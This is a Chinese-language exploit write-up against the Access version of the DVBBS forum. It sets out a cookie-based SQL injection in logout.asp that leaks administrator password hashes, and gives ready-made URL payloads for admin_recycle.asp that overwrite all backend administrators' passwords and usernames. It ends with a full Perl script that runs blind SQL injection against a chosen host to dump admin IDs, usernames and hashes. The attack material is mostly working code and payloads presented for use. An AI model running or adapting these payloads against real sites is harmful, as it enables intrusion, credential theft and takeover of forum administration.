作者:PsKey <PsKey@hotmail.com> 站点:http://www.isgrey.com 小组主页:http://c4st.51.net 小组论坛:http://analysist.tocare.net
>>>Dedicated This Scrap To CaoJing & GuTing<<<
Envymask的睿智帮我解决了很多问题,尽管是兄弟,我还是要说谢谢。
很吃惊地看到了DVBBS发布的安全补丁,原来有人提醒了作者程序所存在的一类漏洞。可以看出,作者对DVBBS做了全面检测,并且在消除那一类漏洞的同时,也顺带消除了其他几个安全隐患。看到自己曾耗费数小时换来的“劳动成果”被作者解决,心中有点不快。
有人、文章错误地认为:动网即使存在漏洞,也只能真正威胁MSSQL版;而ACCESS版的用户敏感信息MD5加密和后台管理的SESSION+COOKIE验证则让大家认为它牢不可破:“顶多让你得到MD5加密后的密码,你还能做什么呢?”、“我们只有暴力破解”、“动网已经是非常安全的程序了”...在一个失落的清晨,我偶然发现了这位亲爱的朋友,她静静地站在绝对的背后,微笑...
因此,本文展示如何攻破“所谓安全”的ACCESS版DVBBS;由于MSSQL版的漏洞利用简单乏味,拒绝介绍。另外,请相关朋友速打补丁。
攻击分两步,首先得到管理员MD5加密的敏感信息,接着在此基础上更改后台管理员密码。
一:得到任意用户MD5加密的敏感信息 可以利用 logout.asp、messanger.asp、myfile.asp...等一大批文件所存在的Sql Injection漏洞达到目的。这些漏洞文件中logout.asp让我稍感新意,选它来说明问题: logout.asp: /-------------------------------------------------------------------------- <!--#include file="conn.asp"-->
<!--#include file="inc/const.asp"-->
<% dim activeuser membername=request.cookies("aspsky")("username") if session("userid")<>"" then activeuser="delete from online where id="&session("userid") Conn.Execute activeuser end if if membername<>"" then activeuser="delete from online where username='"&membername&"'" Conn.Execute activeuser end if Response.Cookies("aspsky").path=cookiepath Response.Cookies("aspsky")("username")="" Response.Cookies("aspsky")("password")="" Response.Cookies("aspsky")("userclass")="" Response.Cookies("aspsky")("userid")="" Response.Cookies("aspsky")("userhidden")="" Response.Cookies("aspsky")("usercookies")="" session("userid")="" conn.close set conn=nothing response.redirect("index.asp") %> /-------------------------------------------------------------------------- 问题语句: activeuser="delete from online where username='"&membername&"'" 很多人会问:这也能利用? 能! 步骤: 1:注册一用户并登陆; 2:在COOKIE中构造membername请求logout.asp,以图程序所执行的SQL查询语句中包含我们利用逻辑关系添加的子语句; 3:构造参数请求主页面,如返回页面包含用户注册名,重复第 2 步; 4:得到敏感信息。
测试程序附后。
二:闯入后台管理 我们已经得到管理员MD5加密的敏感信息,现在可以利用COOKIE欺骗可以在前台执行管理员操作。如果你依然坚持暴力破解,并认为这很有趣,你可以停止阅读本文了。
鄙视暴力破解。不是说不现实,而是说这很乏味。
admin_recycle.asp /-------------------------------------------------------------------------- ... topicid=request("topicid") if request("action")<>"清空回收站" then if topicid="" or isnull(topicid) then Errmsg=Errmsg+"<li>"+"请选择相关帖子后进行操作。" Founderr=true end if end if if request("tablename")="topic" then tablename="topic" elseif instr(request("tablename"),"bbs")>0 then tablename=request("tablename") else Errmsg=Errmsg+"<li>"+"错误的系统参数!" Founderr=true end if if not master then Errmsg=Errmsg+"<li>"+"您不是系统管理员或者您还没有登陆。" Founderr=true end if ... '还原回收站内容 sub redel() dim tempnum,todaynum if instr(tablename,"bbs")>0 then sql="update "&tablename&" set locktopic=0 where Announceid in ("&TopicID&")" conn.execute(sql) ... /-------------------------------------------------------------------------- 问题: 1:未采用SESSION认证 2:topicid没有过滤 3:仅要求tablename包含bbs而不采取其他任何过滤(目前依然未修正)
Tablename和TopicID前后呼应,真是天合之作。提交
http://www.psych.com/d6/admin_recycle.asp?action=还原&topicid='%20where%20id%20in%20(9&tablename=admin%20set%20[password]='ef7813118e77b0ee',lastloginip='bbs
实际执行的是
update admin set [password]='ef7813118e77b0ee', lastloginip='bbs set locktopic=0 where Announceid in (' where id in (9)
这样,ID为 9 的后台管理员的密码就被修改为 ilikecat (ef7813118e77b0ee)。
提交如上URL后,页面会返回出错提示。这是因为后面的SQL语句有语法错误,别管它,我们要求执行的语句已经在它之前“正确”执行了。
注意:前台管理员和后台管理员是一一对应的,弄错了不能正确登陆后台。为了省事,你可以:
http://www.psych.com/d6/admin_recycle.asp?action=还原&topicid='%20where%20(1=1&tablename=admin%20set%20[password]='ef7813118e77b0ee',lastloginip='bbs
所有后台管理员密码修改为 ilikecat (ef7813118e77b0ee)
http://www.psych.com/d6/admin_recycle.asp?action=还原&topicid='%20where%20(1=1&tablename=admin%20set%20username='catlikeme',lastloginip='bbs
所有后台管理员用户名修改为 catlikeme
当然,最好不要无聊到把所有注册用户的帐号和密码全修改了。
OK,本地COOKIE做些处理后,劳请使用 catlikeme/ilikecat 登陆后台进行“管理”。
/----------cidu.net----------[获取任意用户MD5加密信息的测试程序:
#!/usr/bin/perl #Codz By PsKey<PsKey@hotmail.com> #Exploit of DVBBS's logout.asp
#-------------------------------------------------------------------------- # 本脚本针对动网论坛logout.asp文件缺陷而写,可以推算出所有用户 # MD5加密密码;另外可以自动破解后台管理员ID、username、password # 脚本参照最新版本编写,若低版本出现不能用的情况,请自行修改程序 # 脚本利用方法: # 1:在目标论坛以 ilikecat/catlikeme 注册一用户,并得到此用户的 userid # 2:再另注册一任意用户(此步不可少) # 3:运行脚本,按帮助输入命令参数 # 如果是MSSQL版,请把这段糟糕的脚本扔到一边 #--------------------------------------------------------------------------
$|=1; use Socket; use Getopt::Std; getopt('hpwium');
print "\n ===================================================\n"; print " Exploit of DVBBS's logout.asp\n"; print " Codz By PsKey<PsKey\@hotmail.com> \n"; print " www.isgrey.com && c4st.51.net \n"; print " Thanx Envymask<130\@21cn.com> \n"; print " ===================================================\n";
&usage unless ( defined($opt_h) && defined($opt_w) && defined($opt_i) && defined($opt_m));
$host=$opt_h; $port=$opt_p||80; $path=$opt_w; $userid=$opt_i; $user=$opt_u; $mode=$opt_m;
if ($opt_m eq "p") { &usage unless defined($opt_u); print "\nPlease wait...\n\n"; for ($j=1;$j<=16;$j++) { @dic1=(0..9); @dic2=(a..f); @dic=(@dic1,@dic2); &first; for ($i=0;$i<@dic;$i++) { print "$dic[$i]"; $key=$pws.$dic[$i]; $target = "ilikecat'%20and%20exists%20(select%20UserID%20from%20[user]%20where%20UserName='$user'%20and%20left(UserPassword,$j)='$key')%20and%20'1'='1"; &second; if ("@in" !~ /ilikecat/) { $th=$j.th; print "\n\/\/------------The $th word of the password is $dic[$i]"; $pws=$pws.$dic[$i]; last; } } } print "\n\nSuccessful,the full password of $user is $pws.\n"; }
elsif ($opt_m eq "b") {
#Crack ID print "\n\#\#\#\#\#\#\#\#\#\#\#Start cracking admin's id..."; &first; for ($i=0;$i<=50;$i++) { $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$i)%20and%20'1'='1"; &second; if ("@in" !~ /ilikecat/) { print "\n--------->>There is one admin's id $i"; push (@id,$i); &first; } } print "\n\#\#\#\#\#\#\#\#\#\#\#End cracking admin's id...\n"; sleep(2);
#Crack the length of admin's username print "\n\#\#\#\#\#\#\#\#\#\#\#Start Cracking the length of admin's username...\n"; for ($j=0;$j<@id;$j++) { print " \|\-\>cracking username's length which id is $id[$j] ..."; &first; for ($i=0;$i<=50;$i++) { $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20len(username)=$i%20and%20id=$id[$j])%20and%20'1'='1"; &second; if ("@in" !~ /ilikecat/) { print "\n--------->>The length of $id[$j] is $i"; push (@len,$i); &first; last; } } } print "\n\#\#\#\#\#\#\#\#\#\#\#End Cracking the length of admin's username...\n"; sleep(2);
#Crack admin's username print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's username...\n"; @dic1=(0..9); @dic2=(a..z); @dic=(@dic1,@dic2); for ($j=0;$j<@id;$j++) { $pws=""; print " \|\-\>cracking username which id is $id[$j] ..."; OUTER: for ($k=1;$k<=$len[$j];$k++) { &first; USERNAME: for ($i=0;$i<@dic;$i++) { print "$dic[$i]."; $key=$pws.$dic[$i]; $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(username,$k)='$key')%20and%20'1'='1"; &second; if ("@in" !~ /ilikecat/) { $th=$k.th; print "\n--------->>The $th word of $id[$j] username is $dic[$i]"; $pws=$pws.$dic[$i]; last USERNAME; } if ($dic[$i] eq "z") { print "\ni can't crack this admin's name,maybe it is chinese.\n"; push (@user,"\?"); last OUTER; } } } push (@user,$pws); print "\n========>>The username is $pws which id is $id[$j]\n"; } print "\n\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's username...\n"; sleep(2);
#Crack admin's password print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's password...\n"; @dic1=(0..9); @dic2=(a..f); @dic=(@dic1,@dic2); for ($j=0;$j<@id;$j++) { $pws=""; print " \|\-\>cracking password which id is $id[$j] ..."; for ($k=1;$k<=16;$k++) { &first; PASSWORD: for ($i=0;$i<@dic;$i++) { print "$dic[$i]."; $key=$pws.$dic[$i]; $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(password,$k)='$key')%20and%20'1'='1"; &second; if ("@in" !~ /ilikecat/) { $th=$k.th; print "\n--------->>The $th word of $id[$j] password is $dic[$i]"; $pws=$pws.$dic[$i]; last PASSWORD; } } } push (@pass,$pws); print "\n\n========>>The password is $pws which id is $id[$j]\n\n"; } print "\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's password...\n\n"; print "We got them now:\n"; printf("%-4s %-20s %-16s\n",ID,UserName,PassWord); for ($i=0;$i<@id;$i++) { printf("%-4d %-20s %-16s\n",$id[$i],$user[$i],$pass[$i]); } }
else { &usage; }
sub first { $str="username=ilikecat&password=catlikeme&CookieDate=1"; $len=length($str); $req = "GET $path/login.asp?action=chk&username=ilikecat&password=catlikeme HTTP/1.1\n". "Referer: http://$host$path/login.asp\n". "Host: $host\n". "Content-Length: $len\n". "Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show;upNum=0\n". "\n". "$str\n\n"; print "\n."; sendraw($req); $req0 = "GET $path/index.asp HTTP/1.0\n". "Referer: http://$host$path/index.asp\n". "Host: $host\n". "Cookie: aspsky=userid=$userid&usercookies=0&userhidden=2&password=aac9ac496fa5ea8e&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=ilikecat; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n"; print ".\n"; sendraw($req0); }
sub second { $req1 = "GET $path/logout.asp HTTP/1.0\n". "Host: $host\n". "Cookie: aspsky=userid=$userid&usercookies=1&userhidden=2&username=$target; iscookies=0; BoardList=BoardID=Show; \n\n"; print "."; @res = sendraw($req1); $req2 = "GET $path/index.asp?action=show HTTP/1.0\n". "Referer: http://$host$path/index.asp?action=show \n". "Host: $host\n". "Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n"; print "."; @in = sendraw($req2); }
sub usage { print qq~ Usage: $0 -h <Host> [-p <port>] -w <path> -i <userid> -m <mode> [-u <user>] -h =hostname you want to attack -p =port,80 default -w =the web path such as "/dvbbs" -i =the userid of ilikecat -m =only two choice,b<background> and p<proscenium>(This option need -u) -u =the user you want to crack Eg: 1.Crack proscenium $0 -h www.target.com -p 80 -w /dvbbs -i 2 -m p -u admin 2.Crack background $0 -h www.target.com -p 80 -w /dvbbs -i 2 -m b ~; exit; }
sub sendraw { my ($req) = @_; my $target; $target = inet_aton($host) || die("inet_aton problems\n"); socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ select(S); $| = 1; print $req; my @res = <S>; select(STDOUT); close(S); return @res; } else { die("Can't connect...\n"); } } |